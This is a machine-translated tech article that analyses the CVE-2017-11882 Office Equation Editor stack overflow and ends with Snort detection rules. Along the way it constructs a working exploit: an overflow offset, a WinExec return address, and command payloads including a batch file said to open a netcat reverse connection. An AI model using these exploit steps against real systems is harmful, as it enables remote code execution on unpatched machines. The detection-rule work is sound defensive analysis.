Shulou(Shulou.com)05/31 Report--

This article is about Microsoft Office memory damage vulnerability CVE-2017-11882 refers to what, the editor thinks it is very practical, so share it with you to learn, I hope you can get something after reading this article, say no more, follow the editor to have a look.

Abstract

The following analyzes the file structure of CVE-2017-11882 poc samples, and introduces the basic knowledge of rtf file, Equation Native data structure, MTEF stream data structure and FONT record data structure when analyzing poc samples. After analyzing the poc samples, the vulnerabilities are analyzed and debugged by windbg and IDA. On the basis of vulnerability debugging and analysis, the writing process of vulnerability exploit is given. Through poc sample analysis, vulnerability debugging, exploit writing and other processes to grasp the details of the vulnerability, extract the characteristics of the vulnerability. According to the characteristics of the vulnerability and the analysis of IP packets in the network transmission of poc samples, the vulnerability exploitation intrusion detection rules for CVE-2017-11882 are compiled. In the process of writing rules, two guidelines for writing intrusion detection rules are summarized.

1. Introduction of loopholes

The CVE-2017-11882 vulnerability is triggered when office processes formulas. The Office formula is an OLE object, and office automatically calls the module EQNEDT32.EXE to deal with this kind of OLE object when dealing with the formula. A vulnerability exists in the EQNEDT32.EXE program that the font name length is not validated when processing the font tag of the formula object. A vulnerability can lead to a stack overflow that can overwrite the return address of the function and execute malicious code.

two。 Vulnerability analysis 2.1. Tool generates POC samples

Python2017-11882_Generator.py-x "cmd / c calc"-o test.rtf

Python2017-11882_Generator.py download address: https://github.com/BlackMathIT/2017-11882_Generator

Basic knowledge of 2.2.RTF structure

The RTF file consists of unformatted text, control words, control characters, and groups, including the header and document format of: {}.

The maximum length of the control word is 32 characters. The format of the control word is as follows:

\ alphabetic sequence

The delimiters are: spaces, numbers, the connector "-", any other characters other than letters and numbers (at this time the characters are not part of the control word).

Control words generally do not contain uppercase letters, with some exceptions.

The control character consists of a backslash\ followed by a single non-alphabetic character. For example,\ ~ represents a space that does not wrap. Control characters do not require delimiters.

A group consists of text, control words, or control characters included in a pair of curly braces "{}". The left extension "{" indicates the beginning of the group, and the right extension "}" indicates the end of the group.

Fonts, files, formatting, screen colors, revision marks, as well as summary information groups, document format properties, make sure that the font group precedes the format group before the first plain text character of the file. These groups form the headers of the RTF.

2.2.1. File header

The RTF file must be marked with the RTF version number immediately after the left parenthesis, the RTF header needs to specify the supported character set, and the character set control word must precede any plain text or any table control word.

RTF header content:

RTF version,\ rtfN, such as:\ rtf1

Character set, such as:\ ansi

UnicodeRTF, the ANSI code page used to perform Unicode-to-ANSI conversion. Such as:\ ansicpg1252

Default font, default font number\ deff?, such as:\ deff0

Font table

File list?

Color table?

Style sheet?

Cataloging list?

Catalog table {\ listtable}

Catalog replacement table {\ *\ listoverridetable}

Segment Group Properties {\ *\ pgptbl}

Follow up on revisions?

RSID watch?

Generator information?

2.2.1.1. AnsicpgN defines fonts

For example, Ansicpg1252 indicates that the font is Latin, and 1252 is the page number of the Latin font in ansi.

Font corresponding page number table:

874 (ANSI/OEM-Thai)

932 (ANSI/OEM-Japanese Shift-JIS)

936 (ANSI/OEM-simplified Chinese GBK)

949 (ANSI/OEM-Korean)

950 (ANSI/OEM-traditional Chinese Big5)

1250 (ANSI-Central Europe)

1251 (ANSI-Cyrillic)

1252 (ANSI-Latin)

1253 (ANSI-Greek)

1254 (ANSI-Turkish)

1255 (ANSI-Hebrew)

1256 (ANSI-Arabic)

1257 (ANSI-Baltic)

1258 (ANSI/OEM-Vietnam)

2.2.1.2. Generator (\ *\ generator)

Stamp the document, including its name, version, generation number, and so on. The generator area uses the following syntax:

'{' *\ generator';'}'

Where # PCDATA can include: program name, version, generation number, and any other information related to the generator that can be listed here. Only ASCII text is allowed in this area.

Examples of generators:

Generator Riched20 6.3.9600}

2.2.2. Document area

2.2.2.1. The grammar of the document area

? * +

The document area consists of information groups, document format attributes, section text, paragraph text, character text, objects, pictures, etc.

2.2.2.2. Information group grammar

The control word\ info introduces the information group, which contains information about the document. This information includes: title, author, keywords, comments, and other specific information about the file.

2.2.2.3. Document format Properties

After (or without) the information group are some document format control words (described in the syntax description of the document area). These control words indicate the properties of the document and must precede the first plain text character of the document.

For example:\ deflang1033 (define the default language used by the document),\ viewkind4 (define the document view mode)

2.2.2.4. Paragraph text attribute

There are two types of paragraphs: plain text and tables. Such as:\ pard\ sa200\ sl276\ slmult1\ F0\ fs22\ lang9

2.2.2.5. Character text attribute

These properties specify the font (character) format and reset the document language. Such as:\ F0\ fs22\ lang9

2.2.2.6. Object

An object is a target reference that contains data and a result. When the object is an OLE embedded object or a linked object, the data part of the object adopts the structure generated by the OLESaveToStream function.

For example:\ object\ objemb, specifies that the object is an embedded ole object.

\ objupdate, forcing the object to update before it is displayed.

\ objw, object width

Objh, object height

Basic knowledge of 2.3.EquationNative structure

Equation Native stream data = EQNOLEFILEHDR + MTEFData, where

MTEFData = MTEFheader + MTEF Byte Stream

EQNOLEFILEHDR header structure (28 bytes total)

Struct EQNOLEFILEHDR {WORD cbHdr; / / format header length, fixed as 0x1C (28 bytes). DWORD version; / / is fixed as 0x00020000. WORD cf; / / the clipboard format of the formula object. The length of DWORD cbObject; / / MTEF data, excluding headers. DWORD reserved1; / / undisclosed DWORD reserved2; / / undisclosed DWORD reserved3; / / undisclosed DWORD reserved4; / / undisclosed}

MTEF header structure

Struct MTEF_HEADER {BYTE bMtefVersion; / / MTEF version number, generally 0x03 BYTE bPlatform; / / system generation platform, 0x00 is generated for Mac, 0x01 generates BYTE bProduct; / / software generation platform for Windows, 0x00 is generated for MathType, 0x01 generates BYTE bProductVersion; / / product major version number for formula editor BYTE bProductSebVersion; / / product minor version number}

The structure of MTEF Byte Stream

Initial SIZE record: the initial SIZE of the record

PILE or LINE record: a PILE or LINE record tag

Contents of PILE or LINE: the actual content of a PILE or LINE, often one other record (see table below)

END record: end of record

The categories of various record are as follows:

The structure of FONT record and FONT content is as follows:

Struct stuFontRecord {BYTE bTag; / / font file tag bit 0x08 BYTE bTypeFace; / / font style BYTE bStyle; / / font style BYTE bFontName [n] / font name, with NULL as the Terminator}; field value description Tag0 × 081 bytes, fixed as 0 × 08tfacetypeface number1 bytes, Typeface number style1 or 21 bytes, 1 for italics, 2 for bold nameFont name (null-terminated) font name, ending with Null. Analysis of poc sample structure

2.4.1. Rtf structure Analysis of poc samples

{\ rtf1\ ansi\ ansicpg1252\ deff0 {\ fonttbl {\ f0\ fnil\ fcharset0 Calibri } {\ *\ generatorRiched20 6.3.9600} / header, including version information, character set, supporting characters, default font, text table, generator\ deflang1033\ viewkind4 / / document area, information group not available, document format attribute\ pard\ sa200\ sl276\ slmult1 / paragraph text attribute\ f0\ fs22\ lang9 / / character text property, then the following is an embedded object The object / / is a formula object {\ object\ objemb\ objupdate / / the control word here\ objupdate automatically updates the ole object {\ *\ objclassEquation.3} / / this indicates that it is a formula object\ objw380\ objh360 {\ *\ objdata01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff09000600000000000000000000000100... .. .. / / Intermediate data is omitted. .. 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 . / / omit} / / object area\ result the result object control word, and the result target contains the last update result of the object. This / / allows older RTF readers that do not recognize the object or cannot use that particular type of object to replace the object with the current / / preceding object value, thus maintaining its appearance. {\ result {\ pict {\ *\ picprop}\ wmetafile8\ picw380\ pich360\ picwgoal380\ pichgoal260... . / / omit 000f0010000030000000000}}\ par} / /\ par insert a paragraph flag

Among them, the\ objupdate control word ensures that the OLE object is automatically updated and loaded, thus triggering the execution of the vulnerability code. By default, OLE Object in an Office document requires the user to double-click to take effect. Set the properties of the OLE Object to update automatically, so that no interaction is required, and the OLE Object object takes effect when you click to open the document, thus executing malicious code.

The poc is a rtf that contains an Equation Native object, and the malicious code is in the Equation Native object.

2.4.2. Ole object Analysis of poc sample

2.4.2.1. Poc Equation Native object analysis

2.4.2.1.1. Extract ole objects from a document

2.4.2.1.2. View the directory structure of the ole object

You can see that the ole object contains the Equation Native object

2.4.2.1.3. Use olebrowse to view Equation Native objects

2.4.2.1.4. Sample Equation Native header

Combined with the Equation Native header structure, the sample Equation Native headers are as follows:

Offset variable name specification value 0-1cbHdr formula header size 0x001C (28 bytes) 2-5version version number 0x000200006-7cf clipboard format 0xC49E8-11cbObjectMTEF data length 0xA9, i.e. 169byte 12-15reserved1 undisclosed 0x0000000016-19reserved2 undisclosed 0x005CA7C820-23reserved3 undisclosed 0x005BEEC424-27reserved4 undisclosed 0x00000000

2.4.2.1.5. Poc MTEF header

Offset specification value 0MTEF version number 0x031 the data generation platform 0x01 indicates that the Windows platform generates 2 the data generation product 0x01 represents that the formula editor generates 3 product major version number 0x034 product minor version number 0x0A

2.4.2.1.6. Poc MTEF Byte Stream data

The first two bytes in the sample are the initial size value (0a) of the Font record, followed by a line size record (value 01), which is the structural requirement of MTEF Byte Stream.

After these two bytes is the line record, a font record.

Numeric interpretation 0x08FONT record flag 0x5atypeface type 0x5a font style 0x636D6420... Font name (ending with a null character), that is, cmd.exe in figure 9. String 3. Vulnerability analysis 3.1. Set up windbg debug EQNEDT32.exe

Start the registry in the registry key HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ WindowsNT\ CurrentVersion\ Image File Execution Options\ EQNEDT32.EXE

Set debugger to windbg in

Add a DWORD: DisableExceptionChainValidation value to 0

Add a string: debugger value (debugger installation path): e:\ WinDDK\ 7600.16385.1\ Debuggers\ windbg.exe

3.2. Use word to open poc document debugging

Word opens the test.rtf document and automatically starts EQNEDT32.EXE when dealing with the formula, thus opening the windbg debugger

3.3. Analysis of Stack backtracking vulnerabilities

3.3.1. Set breakpoints in WinExec

Because windows generally uses the winexec function to call external commands, set a breakpoint here, bp Kernel 32 calls WinExec

3.3.2. View the stack

Using the db esp command to view the current stack data, you can see that the calculator was called after winexec, indicating that the vulnerability was exploited by winexec.

Execute kb for stack backtracking

WARNING: Stackunwind information not available. Following frames may be wrong.0012f1cc 00430c180012f350 00000000 0012f1ec Kernel32 winExec0012f210 004218e40012f350 0012f5e0 0012f7e4 EqnEdt32MFEnumFunction0x241b

Through stack backtracking, we can see that the return address of the superior function that triggered the WinExec call is: 0x4218e4.

By using IDA Pro inverse EQNEDT32.exe, we can see that the address 0x4218e4 is in the function sub_421774, and it is the address of the program execution instruction returned after the function sub_4115A7 function is called.

That is to say, winexec is called by the function sub_4115A7, so set a breakpoint in 0x4218df and debug the program.

Reread poc

Set the breakpoint, and then g execute

0RV 000 > bp 0x4218df

Looking at the stack information, you can see that the font name string is passed to the function sub_4115a7 for processing, and the EAX register stores font name characters. Eax address 12f350

At this time, the EAX register happens to be the parameter passed to the function sub_4115a7, and the value is the font name of the Font structure in the MTEF byte stream, indicating that the function happens to be dealing with font name data. The result of inverse sub_4115a7 is:

BOOL _ cdeclsub_4115A7 (LPCSTR lpFontName) {CHAR String2; / / [sp+Ch] [bp-24h] @ 2 return strlen (lpFontName)! = 0 & & sub_41160F ((char *) lpFontName, 0, (int) & String2) & &! lstrcmpA (lpFontName, & String2);}

Indicates that the sub_4115A7 function calls sub_41160F to copy the font name into the String2 variable.

Set the address after the sub_4115a7 call to the breakpoint, bp 4115d8, and then g execution, the program directly pops up the calculator. Indicates that the function sub_4115a7 does not return normally after executing sub_41160F.

This means that the return address of the function sub_41160F is overwritten. Let's see that the reverse sub_41160F function can also illustrate the previous analysis.

Int _ _ cdeclsub_41160F (char * lpFontName, char * a2, int lpdstStr) {int result; / / eax@12 char v4; / / [sp+Ch] [bp-88h] @ 5 char cMtef_Byte_Stream; / / [sp+30h] [bp-64h] @ 4 _ _ int16 v6; / / [sp+51h] [bp-43h] @ 5 char * v7; / / [sp+58h] [bp-3Ch] @ 7 int v8; / / [sp+5Ch] [bp-38h] @ 1 _ int16 nFontNameLen / / [sp+60h] [bp-34h] @ 1 int v10; / / [sp+64h] [bp-30h] @ 1 _ int16 v11; / / [sp+68h] [bp-2Ch] @ 1 char v12; / / [sp+6Ch] [bp-28h] @ 1 int v13; / / [sp+90h] [bp-4h] @ 1 LOWORD (v13) =-1; LOWORD (v8) =-1; nFontNameLen = strlen (lpFontName); strcpy (& v12, lpFontName) / / No verification of lpFontName length _ strupr (& v12); v11 = sub_420FA0 (); LOWORD (v10) = 0; while (v11 > (signed _ int16) v10) / / processing MTEF byte stream {if (read_MTEF_Byte_Stream (v10 cMtef_Byte_Stream)) {strcpy (& v4, & cMtef_Byte_Stream); if (V6 = 1) _ strupr (& v4) V7 = strstr (& v4, lpFontName) / / determine whether lpFontName is a substring of v4, from which it is inferred that the function in the if statement reads the MTEF Byte Stream information if (v7 | (v7 = strstr (& v4 recording v12))! = 0) / / if MTEF byte stream contains the font name {if (! a2 |! strstr (& v4, a2)) / / this function is not executed Because a2room0 {if ((signed__int16) strlen (& cMtef_Byte_Stream) = = nFontNameLen) {strcpy ((char *) lpdstStr,&cMtef_Byte_Stream) Return 1;} if (v7 = & v4) LOWORD (v8) = v10; else LOWORD (v13) = v10;}} LOWORD (v10) = v10 + 1 } / / the end of TEF byte stream reading / / the v8 in this poc is then executed by g, and then step by step. You can see that when the function sub_41160F returns, it jumps to the address 4c0312.

Then step into the winexec process. When we look at the eax at the address 75f5e6a5, we can see that the parameters passed to the function include cmd / c calc.

Continue F10 will pop up the calculator

3.4. Poc construction

Based on the previous vulnerability analysis and poc sample analysis, we began our own vulnerability exploit poc construction process. The vulnerability occurs when processing the bFontName [n] field of the struct stuFontRecord structure.

Let's look at the space the program allocates to the target string.

The space allocated is: 0x28-0x4=0x24, that is, an overflow occurs when the coverage exceeds the length of the 0x24 space. The return address of the r program is at the distance from dstStr:0x24+0x4+0x4=0x2c, that is, if 0x2c+4=48 is needed, the return address of the program is overwritten, that is, a string of 96 characters.

We construct the following result string

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB

The font section after overwriting is as follows:

When you execute poc, you can see that the ip pointer just returns to bbbbbbbb, indicating that this place just overrides the return address of the function.

Then we replace bbbbbbbb with the winexec address, and we can see that the winexec address is at: 0x430c12

Therefore, we replace bbbbbbbb with: 120c4300, and the sample font section after replacement is as follows:

The execution sample will find that winexec has been executed because the program has already executed the instruction at address: 430C2F

Then replace the rest with executable commands (assuming that a file named test.bat already exists on the e: disk, which is reverse connected to the attacking side, and the system has a netcat program)

Cmd / c e:/test.bat

Hexadecimal converted to: 636d64202f6320653a2f746573742e6261742026, less than 48 bytes (96 characters) filled with "41".

The poc font section after replacement is as follows:

Then execute poc, and the information of the attacker is as follows:

4. Vulnerability exploitation feature

Feature 1: "\ object\ objemb\ objupdate", automatically updates embedded objects, triggers malicious code execution, and offsets 0xD6 in poc

Feature 2: "\ objclass Equation.3", formula object, because the vulnerability is Microsoft formula processing vulnerability, > 2000 (4708) bytes is followed by feature 3, the offset is 0x133A

Feature 3: "1c0000000200", Equation Native header invariant, 45 bytes followed by feature 4, offset 0x1345

Feature 4: "03 or 02 or 01", MTEF version number, 6 bytes followed by feature 5, offset 0x1372

Feature 5: "08", font tag, must, 50 bytes after feature 6, offset 0x1380, font tag after 2 bytes is the font name. Since the bytes filled with font names in the rtf file are represented in hexadecimal form, with 2 characters per byte, the time byte offset is 0x13e4-0x1380=100.

Feature 6: "| 30 |". An overflow occurs when the font name is greater than 44, followed by a 4-byte return address followed by a null byte. | 30 |, offset 0x13e4

5. Protocol Analysis and intrusion Detection Rule Writing

Through the IP package, we can see that the vulnerability characteristics are distributed in two shards, so the complete matching of vulnerabilities requires flow tracking, which is tracked by setting keywords through flowbits. Through the analysis of IP packets and the characteristics of the previous vulnerabilities, we write the following detection rules for vulnerabilities (the rules are divided into rtf files, rtf files, objupdate flow identification, and rtf vulnerability exploitation identification. Because the detection of file vulnerabilities by snort requires that the data packet is a file of the corresponding rtf type, and the "\ objupdate" and "| 5C | objclass Equation | 2e | 3" in the file stream before the real attack characteristics of the vulnerability can be identified.)

Alert tcp$EXTERNAL_NET any-> $HOME_NET any (msg: "FILE-OFFICE Microsoft EquationNative autoupdate find--toserver"; flow:to_server,established;content: "| 7b 5c 72 74 66 |"; content: "| 5C | object | 5C | objemb | 5C | objupdate"; nocase;content: "| 5C | objclass Equation | 2e | 3"; nocase; fast_pattern;flowbits:set,rtf_autoupdate; flowbits:noalert; metadata:policy balanced-ips drop,policy security-ips drop, service ftp-data, service http, service imap, servicepop3; reference:cve,2017-11882; classtype:misc-activity Sid:2018000009;rev:1;) alert tcp$EXTERNAL_NET any-> $HOME_NET any (msg: "FILE-OFFICE Microsoft EquationNative Fontname parsing buffer overflow attempt--toserver"; flow:to_server,established; flowbits:isset,rtf_autoupdate;content: "1c0000000200"; pcre: "/ (03 | 02 | 01) /"; content: "08"; distance:6; content: "| 30 |"; distance:100;metadata:policy balanced-ips drop, policy security-ips drop, service ftp-data,service http, service imap, service pop3 Reference:cve,2017-11882; sid:2018000010; rev:1;) 6. Intrusion detection test effect

We upload the poc rtf file to the ftp server, then the packet intercepted by wireshark is replayed, and then detected by snort. The detection result is as follows:

7. Two guidelines for compiling intrusion detection rules by exploiting vulnerabilities

1) vulnerability uses intrusion detection rules to write the first rule: according to the characteristics of vulnerabilities, write intrusion detection rules for vulnerabilities, not for specific attacks. (for example: our rules are aimed at the characteristics of vulnerabilities: necessary objects, font names with a length of more than 48 bytes, etc. We didn't use the return address, nor did we use specific commands such as winexec\ cmd, because these can be changed. )

2) vulnerability uses intrusion detection rules to write the second rule: if you need to write detection rules for attacks, write intrusion detection rules for attack patterns, rather than using commands or statements for specific vulnerabilities. There is no contradiction between Criterion two and Criterion one, and the attack mode is essentially the external expression pattern of the vulnerability condition. )

This is what the Microsoft Office memory corruption vulnerability CVE-2017-11882 refers to. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.